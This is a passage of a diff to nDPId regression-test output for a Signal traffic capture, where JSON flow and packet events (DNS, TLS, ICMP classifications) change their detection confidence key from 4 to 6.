00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":149,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051255515,"flow_last_seen":1569051255515,"flow_idle_time":7580000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":1,"thread_ts_msec":1569051255515,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.146.144","src_port":56996,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00531{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1569051255515,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"thread_ts_msec":1569051255515,"pkt":"xiwDYGpkxGGLNYKpCABFAABiAABAAEAG01TAqAIREfiSkN6kAbu8mMGjrFDpOoAYBADERQAAAQEICihVb2TeKRePFwMDACkAAAAAAAAAByneD5KHf7LhXiN5Pdq3wP31zhE4MGciEgckOq75+f9F5w=="} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051255515,"flow_last_seen":1569051255515,"flow_idle_time":7580000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":1,"thread_ts_msec":1569051255515,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.146.144","src_port":56996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
+00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051255515,"flow_last_seen":1569051255515,"flow_idle_time":7580000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":1,"thread_ts_msec":1569051255515,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.146.144","src_port":56996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1569051255515,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1569051255515,"pkt":"xiwDYGpkxGGLNYKpCABFAABTAABAAEAG02PAqAIREfiSkN6kAbu8mMHRrFDpOoAYBABt7AAAAQEICihVb2XeKRePFQMDABoAAAAAAAAACJW1v\/IhTp91V+O68DpoE88kag=="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1569051255515,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051255515,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG04LAqAIREfiSkN6kAbu8mMHwrFDpOoARBACJkgAAAQEICihVb2XeKReP"} 
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":157,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051257169,"flow_last_seen":1569051257169,"flow_idle_time":7580000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":1,"thread_ts_msec":1569051257169,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"2.18.232.118","src_port":57017,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1569051257169,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1569051257169,"pkt":"xiwDYGpkxGGLNYKpCABFAABLAABAAEAGjWvAqAIRAhLodt65Absqy4Q4WMZypYAYBABE5AAAAQEICihVdq6vX9qZFQMDABKEOlUEciue5QZs7g3+sWQHUk8="} -00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051257169,"flow_last_seen":1569051257169,"flow_idle_time":7580000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":1,"thread_ts_msec":1569051257169,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"2.18.232.118","src_port":57017,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051257169,"flow_last_seen":1569051257169,"flow_idle_time":7580000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":1,"thread_ts_msec":1569051257169,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"2.18.232.118","src_port":57017,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1569051257169,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051257169,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGjYLAqAIRAhLodt65Absqy4RPWMZypYARBABBggAAAQEICihVdq6vX9qZ"} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1569051257192,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1569051257192,"pkt":"xGGLNYKpxiwDYGpkCABFAABL884AADUG5JwCEuh2wKgCEQG73rlYxnKlKsuET4AYAQIBNAAAAQEICq9gUAcoVXauFQMDABK6ebhIWf6gqCdSaZoYDdKf06A="} 
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264073,"flow_last_seen":1569051264073,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051264073,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -60,7 +60,7 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1569051264078,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051264078,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGSLbAqAIRFzkYEN6+AbvH3a+JAAAAALAC\/\/8ydQAAAgQFtAEDAwcBAQgKKFWSTQAAAAAEAgAA"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":174,"source":"signal.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264088,"flow_last_seen":1569051264088,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1569051264088,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":56263,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"signal.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1569051264088,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1569051264088,"pkt":"xiwDYGpkxGGLNYKpCABFAABTylIAAP8Ra+TAqAIRwKgCAdvHADUAPyTGAMEBAAABAAAAAAAAEnRleHRzZWN1cmUtc2VydmljZQ53aGlzcGVyc3lzdGVtcwNvcmcAAAEAAQ=="} 
-00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":174,"source":"signal.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264088,"flow_last_seen":1569051264088,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1569051264088,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":56263,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Signal","breed":"Fun","category":"Chat"},"dns": {"query":"textsecure-service.whispersystems.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":174,"source":"signal.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264088,"flow_last_seen":1569051264088,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1569051264088,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":56263,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Signal","breed":"Fun","category":"Chat"},"dns": {"query":"textsecure-service.whispersystems.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264090,"flow_last_seen":1569051264090,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051264090,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1569051264090,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051264090,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGUS7AqAIRI6kDKN6\/Abvpz5RJAAAAALAC\/\/80LQAAAgQFtAEDAwcBAQgKKFWSWgAAAAAEAgAA"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":176,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264091,"flow_last_seen":1569051264091,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051264091,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -69,71 +69,71 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1569051264093,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051264093,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGUS7AqAIRI6kDKN7BAbuYIIuMAAAAALAC\/\/+OlgAAAgQFtAEDAwcBAQgKKFWSWwAAAAAEAgAA"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1569051264113,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051264113,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADQGlLoXORgQwKgCEQG73r7gO6oYx92viqAScSBHlgAAAgQFrAQCCAqWTmoXKFWSTQEDAwc="} 00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"signal.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1569051264113,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":193,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":193,"pkt_l4_len":159,"thread_ts_msec":1569051264113,"pkt":"xGGLNYKpxiwDYGpkCABFAACz4rsAAEAREhzAqAIBwKgCEQA128cAn9JUAMGBgAABAAYAAAAAEnRleHRzZWN1cmUtc2VydmljZQ53aGlzcGVyc3lzdGVtcwNvcmcAAAEAAcAMAAEAAQAAAB0ABDavL27ADAABAAEAAAAdAAQi4fCtwAwAAQABAAAAHQAEaxdHWcAMAAEAAQAAAB0ABCOpAyjADAABAAEAAAAdAAQ0zyk7wAwAAQABAAAAHQAENMjD8Q=="} 
-00802{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"signal.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569051264088,"flow_last_seen":1569051264113,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1569051264113,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":56263,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Signal","breed":"Fun","category":"Chat"},"dns": {"query":"textsecure-service.whispersystems.org","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.175.47.110"}} +00802{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"signal.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569051264088,"flow_last_seen":1569051264113,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1569051264113,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":56263,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Signal","breed":"Fun","category":"Chat"},"dns": {"query":"textsecure-service.whispersystems.org","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.175.47.110"}} 
00547{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":180,"source":"signal.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264115,"flow_last_seen":1569051264115,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569051264115,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"signal.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1569051264115,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569051264115,"pkt":"xiwDYGpkxGGLNYKpCABFAAA4YPoAAEABlGjAqAIRwKgCAQMDIGEAAAAARQAAs+K7AABAERIcwKgCAcCoAhEANdvHAJ8AAA=="} -00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":180,"source":"signal.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264115,"flow_last_seen":1569051264115,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569051264115,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.664498} 
+00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":180,"source":"signal.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264115,"flow_last_seen":1569051264115,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569051264115,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.664498} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1569051264116,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051264116,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGSMLAqAIRFzkYEN6+AbvH3a+K4DuqGYAQBAvjSwAAAQEICihVknGWTmoX"} -00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264078,"flow_last_seen":1569051264116,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264116,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57022,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00935{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":184,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264078,"flow_last_seen":1569051264151,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264151,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57022,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264078,"flow_last_seen":1569051264116,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264116,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57022,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00935{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":184,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264078,"flow_last_seen":1569051264151,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264151,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57022,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":190,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1569051264185,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051264185,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G4zEjqQMowKgCEQG7wEvNn9QhBdFlyaASaN\/LpgAAAgQFrAQCCApkFUBJKFWN0AEDAwg="} 
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1569051264186,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051264186,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGUTrAqAIRI6kDKMBLAbsF0WXJzZ\/UIoAQCBZawQAAAQEICihVjkRkFUBJ"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1569051264198,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051264198,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G4zEjqQMowKgCEQG73r+o1iHY6c+USqASaN9tOAAAAgQFrAQCCApkFUBMKFWSWgEDAwg="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1569051264203,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051264203,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G4zEjqQMowKgCEQG73sBFykuNjtdEXqASaN9RcQAAAgQFrAQCCApkFUBNKFWSWwEDAwg="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":195,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1569051264203,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051264203,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G4zEjqQMowKgCEQG73sEV2c5FmCCLjaASaN+uMAAAAgQFrAQCCApkFUBNKFWSWwEDAwg="} 
-00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264073,"flow_last_seen":1569051264229,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1569051264229,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264073,"flow_last_seen":1569051264229,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1569051264229,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": 